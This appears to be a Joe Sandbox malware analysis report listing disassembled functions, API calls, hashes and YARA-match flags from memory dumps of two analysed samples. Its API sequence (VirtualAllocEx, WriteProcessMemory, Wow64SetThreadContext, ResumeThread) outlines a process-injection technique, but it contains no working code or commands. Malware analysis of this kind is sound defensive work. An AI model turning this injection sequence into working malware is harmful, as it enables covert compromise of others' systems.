                                                                                                              • Source File: 0000000A.00000002.415605312.00000000005C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_5c0000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0
                                                                                                              • Opcode ID: c917ba9abfd494262e3692675c2aa0b60be6e81f1381257e232cd9e942aee1b4
                                                                                                              • Instruction ID: 38fa1db950ab15877f6e9d4be134aacfff089087d14e25a79a45f8b8046b10c7
                                                                                                              • Opcode Fuzzy Hash: c917ba9abfd494262e3692675c2aa0b60be6e81f1381257e232cd9e942aee1b4
                                                                                                              • Instruction Fuzzy Hash: 7FC105B1D002298FDF24CFA4C845BEEBBB1BF49304F1091A9D959B7240DB749A85CF95
                                                                                                              Function 005C6580 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 368 5c6580-5c65eb 370 5c65ed-5c65ff 368->370 371 5c6602-5c6669 WriteProcessMemory 368->371 370->371 373 5c666b-5c6671 371->373 374 5c6672-5c66c4 371->374 373->374
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 005C6653
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.415605312.00000000005C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_5c0000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: 11120c8595b34670e25ff4af7e23e4b38b3a8f19b418e19fdc3137d10cb0cf27
                                                                                                              • Instruction ID: 0f4942fb4dd514928235c1e390c3eacea6790ee5c043e695b66387ab51f52b35
                                                                                                              • Opcode Fuzzy Hash: 11120c8595b34670e25ff4af7e23e4b38b3a8f19b418e19fdc3137d10cb0cf27
                                                                                                              • Instruction Fuzzy Hash: 0141ABB4D012589FCF00CFA9D984AEEFBF1BB49314F20942AE814BB210D775AA45CF64
                                                                                                              Function 005C6578 Relevance: 1.6, APIs: 1, Instructions: 117injectionCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 379 5c6578-5c65eb 382 5c65ed-5c65ff 379->382 383 5c6602-5c6669 WriteProcessMemory 379->383 382->383 385 5c666b-5c6671 383->385 386 5c6672-5c66c4 383->386 385->386
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 005C6653
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.415605312.00000000005C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_5c0000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: fb460de148555128520f9f98453fd75afd7052f4a9a341db5bfd2931814563a2
                                                                                                              • Instruction ID: ab8ca970edc7c1a8eb6ade44f78b674bb408d8a4477e970fb2b613fdd8d6eb8c
                                                                                                              • Opcode Fuzzy Hash: fb460de148555128520f9f98453fd75afd7052f4a9a341db5bfd2931814563a2
                                                                                                              • Instruction Fuzzy Hash: 8441ABB4D01218DFDF00CFA9D984ADEBBB1BB49314F24942AE818B7250D735AA45CF64
                                                                                                              Function 005C66D9 Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 391 5c66d9-5c67a8 ReadProcessMemory 394 5c67aa-5c67b0 391->394 395 5c67b1-5c6803 391->395 394->395
                                                                                                              APIs
                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 005C6792
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.415605312.00000000005C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_5c0000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 1726664587-0
                                                                                                              • Opcode ID: 3754b287b256775ae201bf4e458ef2f68810b73f22330a9c7da64ac3e3752ee9
                                                                                                              • Instruction ID: 875bfecaf415a4a8e8586b51206de0f213a65cbba2115bf30f100faa98b37e08
                                                                                                              • Opcode Fuzzy Hash: 3754b287b256775ae201bf4e458ef2f68810b73f22330a9c7da64ac3e3752ee9
                                                                                                              • Instruction Fuzzy Hash: A341AAB9D002589FCF00CFA9D984AEEFBB1BF49314F24942AE814BB210D735A945CF64
                                                                                                              Function 005C66E0 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 400 5c66e0-5c67a8 ReadProcessMemory 403 5c67aa-5c67b0 400->403 404 5c67b1-5c6803 400->404 403->404
                                                                                                              APIs
                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 005C6792
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.415605312.00000000005C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_5c0000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 1726664587-0
                                                                                                              • Opcode ID: 96465f5c19521a6cbce7b684763cb5ec7b16635b3cdc57826de90ecc0f821aa0
                                                                                                              • Instruction ID: 09d6b65072bef0e2a508ee4b47cce8bd5bac7812bd090e944dcbf58f06f653a1
                                                                                                              • Opcode Fuzzy Hash: 96465f5c19521a6cbce7b684763cb5ec7b16635b3cdc57826de90ecc0f821aa0
                                                                                                              • Instruction Fuzzy Hash: 4841A8B8D002589FCF00CFA9D984AEEFBB1FB49310F20942AE814B7200D775AA45CF65
                                                                                                              Function 005C6450 Relevance: 1.6, APIs: 1, Instructions: 107memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 409 5c6450-5c6518 VirtualAllocEx 412 5c651a-5c6520 409->412 413 5c6521-5c656b 409->413 412->413
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 005C6502
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.415605312.00000000005C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_5c0000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: 8976d2f09fe3deeb83bd89eda55765d67f681b6c25fadd16404cbf81b991e1ec
                                                                                                              • Instruction ID: 8087116deebd3a98ea68f1825da11498f6a9a14ed0f9de7e96aa6335c75fe3fa
                                                                                                              • Opcode Fuzzy Hash: 8976d2f09fe3deeb83bd89eda55765d67f681b6c25fadd16404cbf81b991e1ec
                                                                                                              • Instruction Fuzzy Hash: 7B41AAB8D002589FCF10CFA9D984AEEBBB1BF49310F24942AE814BB210D735A906CF55
                                                                                                              Function 005C6458 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 418 5c6458-5c6518 VirtualAllocEx 421 5c651a-5c6520 418->421 422 5c6521-5c656b 418->422 421->422
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 005C6502
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.415605312.00000000005C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_5c0000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: f874d8da349f4f1cb817f0a81c2e22ddd61f61c20327a43e838a97bd3445e710
                                                                                                              • Instruction ID: fbdcb928b0d6fb1a02589d227fefef15ee3cab64565843ffabcca0cb0a3a09ec
                                                                                                              • Opcode Fuzzy Hash: f874d8da349f4f1cb817f0a81c2e22ddd61f61c20327a43e838a97bd3445e710
                                                                                                              • Instruction Fuzzy Hash: 154177B8D00258DFCF10CFA9D984ADEBBB5FB49310F20942AE814BB210D775A945CF65
                                                                                                              Function 001DADFA Relevance: 1.6, APIs: 1, Instructions: 99memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 427 1dadfa-1daebd VirtualProtect 430 1daebf-1daec5 427->430 431 1daec6-1daf02 427->431 430->431
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 001DAEA7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.409784532.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_1d0000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: 800d1e41d3ddab46b661436e98ac4a17617d136145a2f277c21b15783a0f5caf
                                                                                                              • Instruction ID: ac293011c9420da04b08566951d51ceeb4a03a1077ee8f52b60a99b41557455b
                                                                                                              • Opcode Fuzzy Hash: 800d1e41d3ddab46b661436e98ac4a17617d136145a2f277c21b15783a0f5caf
                                                                                                              • Instruction Fuzzy Hash: FB3176B9D002589FCF14CFA9D984ADEFBB5AB49310F24902AE814B7210D375AA45CF65
                                                                                                              Function 005C6321 Relevance: 1.6, APIs: 1, Instructions: 97threadCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 434 5c6321-5c6388 436 5c639f-5c63ed Wow64SetThreadContext 434->436 437 5c638a-5c639c 434->437 439 5c63ef-5c63f5 436->439 440 5c63f6-5c6442 436->440 437->436 439->440
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 005C63D7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.415605312.00000000005C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_5c0000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              • Opcode ID: 8da36d0c565f750d95297ad9cd0e7dccea27f01e0df76f9aa94db9cd1144475d
                                                                                                              • Instruction ID: 4e7483e22f13529e5b53ff09866e30ecade6da9f5e8eb977f9c0cbf65fde5e7e
                                                                                                              • Opcode Fuzzy Hash: 8da36d0c565f750d95297ad9cd0e7dccea27f01e0df76f9aa94db9cd1144475d
                                                                                                              • Instruction Fuzzy Hash: 1E41BCB4D012589FDB14CFA9D984AEEFFB1BF49314F24842AE418BB240D739AA45CF54
                                                                                                              Function 001DAE00 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 445 1dae00-1daebd VirtualProtect 447 1daebf-1daec5 445->447 448 1daec6-1daf02 445->448 447->448
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 001DAEA7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.409784532.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_1d0000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: 389450b4e0e555513aa0a0f68dfe75f4ce5c1bc4606b24600d509dfaecede78f
                                                                                                              • Instruction ID: e287eca7bc333fe9016a08f78a7553660ae3fe4baedf5d221008daf0695b0c69
                                                                                                              • Opcode Fuzzy Hash: 389450b4e0e555513aa0a0f68dfe75f4ce5c1bc4606b24600d509dfaecede78f
                                                                                                              • Instruction Fuzzy Hash: 4D3175B9D002589FCF14CFA9D984ADEFBB5AB49310F24902AE814B7310D375AA45CF65
                                                                                                              Function 005C6328 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 005C63D7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.415605312.00000000005C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_5c0000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              • Opcode ID: ba60ea3075a000fb1ac96a7d1fefd54d41dff576abfa04974792d4bdc6a4c518
                                                                                                              • Instruction ID: 6d243c961890119e130aa58d63c3a4be889273811453ff4f280b844a9106247b
                                                                                                              • Opcode Fuzzy Hash: ba60ea3075a000fb1ac96a7d1fefd54d41dff576abfa04974792d4bdc6a4c518
                                                                                                              • Instruction Fuzzy Hash: B941BAB4D002589FDB10CFAAD984AEEBBB1BB49314F24842AE418B7240D778AA45CF54
                                                                                                              Function 005C6238 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ResumeThread.KERNELBASE(?), ref: 005C62B6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.415605312.00000000005C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_5c0000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 947044025-0
                                                                                                              • Opcode ID: cf0b4180b0e9caf0ae31b68aa3e460ee23d27e806630865a3bf8908f14efcf6e
                                                                                                              • Instruction ID: 6dce57d89326a0dc4f3a2d2885691b6639580c44bbcc0350fff1174b240ffbfa
                                                                                                              • Opcode Fuzzy Hash: cf0b4180b0e9caf0ae31b68aa3e460ee23d27e806630865a3bf8908f14efcf6e
                                                                                                              • Instruction Fuzzy Hash: 7631A9B4D012189FDF14CFA9D984AEEFBB4FB89314F24942AE815B7200D775A905CF94
                                                                                                              Function 000BD01C Relevance: .1, Instructions: 72COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.408796779.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_bd000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4fd97e6149cc314de246fc2626664fd8a8d395cec4259607df39fa35e3ca189b
                                                                                                              • Instruction ID: 697b789ba26649936becb6fa04f5673063215c21629691d43a481d802f9f100e
                                                                                                              • Opcode Fuzzy Hash: 4fd97e6149cc314de246fc2626664fd8a8d395cec4259607df39fa35e3ca189b
                                                                                                              • Instruction Fuzzy Hash: CB21D075614340DFEB24EF14D884B56FBA1EB88314F34C6AAD8094B246D33AD846CBA2
                                                                                                              Function 000BD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.408796779.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_bd000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5857745e286519682bc93b8def28fdfef789daf33f15cd577ecc9c106e3e1028
                                                                                                              • Instruction ID: 21b873b0c5e4d1db0819896c048a4f6efb348390b4c3f93736f2bdcc9e436685
                                                                                                              • Opcode Fuzzy Hash: 5857745e286519682bc93b8def28fdfef789daf33f15cd577ecc9c106e3e1028
                                                                                                              • Instruction Fuzzy Hash: 58210475604380EFEB15CF14D9C0B66FBA1FB94314F34C6AAE8094B242D336D846CB61
                                                                                                              Function 000BD006 Relevance: .1, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.408796779.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_bd000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e382a1ced39454100e6740d200dc84179c0f89e56f58950ee9b2fffc635a3414
                                                                                                              • Instruction ID: e7256da89175e162c5bd7f41207ade984a1a0dc9222eda751a7166f14beefd19
                                                                                                              • Opcode Fuzzy Hash: e382a1ced39454100e6740d200dc84179c0f89e56f58950ee9b2fffc635a3414
                                                                                                              • Instruction Fuzzy Hash: FC217F75508380DFCB02DF14D994B11BFB1EB46314F28C5EBD8498F266D33A985ACBA2
                                                                                                              Function 000BD1CF Relevance: .1, Instructions: 53COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.408796779.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_bd000_PEJmengI.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b5c68ee77780e459a8ed82bc23ea6c7dcb049b3dc04f4803eb97a4645ef7b5e5
                                                                                                              • Instruction ID: c9b675fea8bb7bd4d546ba383c6f8b9d4839cea0f473ca45d3e26dead1afa3be
                                                                                                              • Opcode Fuzzy Hash: b5c68ee77780e459a8ed82bc23ea6c7dcb049b3dc04f4803eb97a4645ef7b5e5
                                                                                                              • Instruction Fuzzy Hash: 0C11B875904280DFDB42CF10C9C4B55FFA1FB94314F28C6AAD8494B656C33AD84ACBA2

                                                                                                              Executed Functions

                                                                                                              Function 040ADDBD Relevance: 29.2, Strings: 23, Instructions: 434COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ?$"j$$$)$)$2$6$7C$<k$@$B$IX$L$Mw$OT$OT$Sa$j$kU$m$z.$:$p
                                                                                                              • API String ID: 0-1047631854
                                                                                                              • Opcode ID: 250bd1deabf11c2043e31c9ba3b3705dabf18363cc4dbb49c84fa5530713aa3d
                                                                                                              • Instruction ID: 3fd952d600c5fa6160a347d078225333c90f523ea86143db9348ddd98374d71d
                                                                                                              • Opcode Fuzzy Hash: 250bd1deabf11c2043e31c9ba3b3705dabf18363cc4dbb49c84fa5530713aa3d
                                                                                                              • Instruction Fuzzy Hash: 5332C3B0D45229CBEB28CF44D998BEDBBB2BB44308F1081D9D50D7B280D7B56A94DF81
                                                                                                              Function 040BBA1D Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 6$O$S$\$s
                                                                                                              • API String ID: 0-3854637164
                                                                                                              • Opcode ID: 56ab9df5c11938337c652ea74ed91fddbdbceb7b8d3eb7ea9f8349fa386e0f1b
                                                                                                              • Instruction ID: db0b2ae2138d921a2caf03ac8d855a4a481700443c6e4ce8c71e7e57a9be74d3
                                                                                                              • Opcode Fuzzy Hash: 56ab9df5c11938337c652ea74ed91fddbdbceb7b8d3eb7ea9f8349fa386e0f1b
                                                                                                              • Instruction Fuzzy Hash: 755181B2D00118ABDB10EF94DC89FEEB3B8EF54719F0081A9E90C67140E7B57A548BE1
                                                                                                              Function 040A724E Relevance: .1, Instructions: 133COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1f606145ee6f7a392aff193389f19703048a6601b137c67aa90b71660fbd2628
                                                                                                              • Instruction ID: 306f6c3093de6437bd84bb1b8b0b8bc0178e9d3fb8bf893a96770d21892ae10f
                                                                                                              • Opcode Fuzzy Hash: 1f606145ee6f7a392aff193389f19703048a6601b137c67aa90b71660fbd2628
                                                                                                              • Instruction Fuzzy Hash: 44411DB1D11219AFDB14CF99D881AEEBBBCEF49714F10415AFA14E7240E7B1A641CBA0
                                                                                                              Function 040CC49D Relevance: .1, Instructions: 97COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3e987fffb49473e6bc214f8bf284547be807434b4b753ddbd6d5e07491ee6258
                                                                                                              • Instruction ID: 46a3bb392ee0975b7109ee0116cf7e1153d2e68ae52194e19e93363d564b1a10
                                                                                                              • Opcode Fuzzy Hash: 3e987fffb49473e6bc214f8bf284547be807434b4b753ddbd6d5e07491ee6258
                                                                                                              • Instruction Fuzzy Hash: 8A31E1B5A00208AFDB14DF99D881EEEB7B9AF8C314F108219F918A7340D730A851CBA1
                                                                                                              Function 040CC3BD Relevance: .1, Instructions: 85COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e9f76fb5044966d8b9c747d9d1325e87b1f183ae6c114cc6b93dd117d557072e
                                                                                                              • Instruction ID: d868f9b78b5dbc62284867b576ecf7ee9d3dc2b399357c41a4171d0c16486701
                                                                                                              • Opcode Fuzzy Hash: e9f76fb5044966d8b9c747d9d1325e87b1f183ae6c114cc6b93dd117d557072e
                                                                                                              • Instruction Fuzzy Hash: 9231F8B5A00609AFDB14EF99DC41EEFB7F9EF88304F108619F918A7240D770A811CBA1
                                                                                                              Function 040CCD2D Relevance: .1, Instructions: 77COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e8adc32fcfee9950e4ba5222b01eef5f20ac9763c26a9b64b453e90786937ee9
                                                                                                              • Instruction ID: 7947d9cdfe6c2bfb85392782e20376c70953565291f35083b323ab124b0da835
                                                                                                              • Opcode Fuzzy Hash: e8adc32fcfee9950e4ba5222b01eef5f20ac9763c26a9b64b453e90786937ee9
                                                                                                              • Instruction Fuzzy Hash: DE21EBB5A00219AFEB14DF98DC41EEFB7B9EF88714F10451DF918A7240D7706921CBA5
                                                                                                              Function 040BB85D Relevance: .1, Instructions: 75COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a30d71f374c94724dad470f83b5ea0bf109194f2d4a5f694dc6be19dc287062d
                                                                                                              • Instruction ID: 88718f88ea6479f0ab80cb010600b1ae80ada82599c04bab2d00a53fac51d86e
                                                                                                              • Opcode Fuzzy Hash: a30d71f374c94724dad470f83b5ea0bf109194f2d4a5f694dc6be19dc287062d
                                                                                                              • Instruction Fuzzy Hash: 1C1186B2380215BBF7209E55DC42FEF375D9B84B59F244019FF08BE2C1D6A5B81186B8
                                                                                                              Function 040C8C6D Relevance: .1, Instructions: 65COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a4a134050f2a525881f3ae1b2260dd856a2d6ec1e3ee6a59fd2441e77cc3c80d
                                                                                                              • Instruction ID: acb89ddb31c8c0b8a063a0f99e446c3fb46e8f61585c17d0cb58965fe9735404
                                                                                                              • Opcode Fuzzy Hash: a4a134050f2a525881f3ae1b2260dd856a2d6ec1e3ee6a59fd2441e77cc3c80d
                                                                                                              • Instruction Fuzzy Hash: 8311FEB6D1121CAF9B40DFA9D8419EFB7F9EF48214F10416EE919E7200E7706A148BE1
                                                                                                              Function 040CC04D Relevance: .1, Instructions: 65COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_3e40000_mrNbohrgjTw.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3e8e707b218d8fdd7a260f4b092869ae98b7887250b8a8332188c3394480f5e0
                                                                                                              • Instruction ID: 202764ca7cea403424e55258dc6f51618c70b1d72c80a71a2ecf73ed957cbe21
                                                                                                              • Opcode Fuzzy Hash: 3e8e707b218d8fdd7a260f4b092869ae98b7887250b8a8332188c3394480f5e0
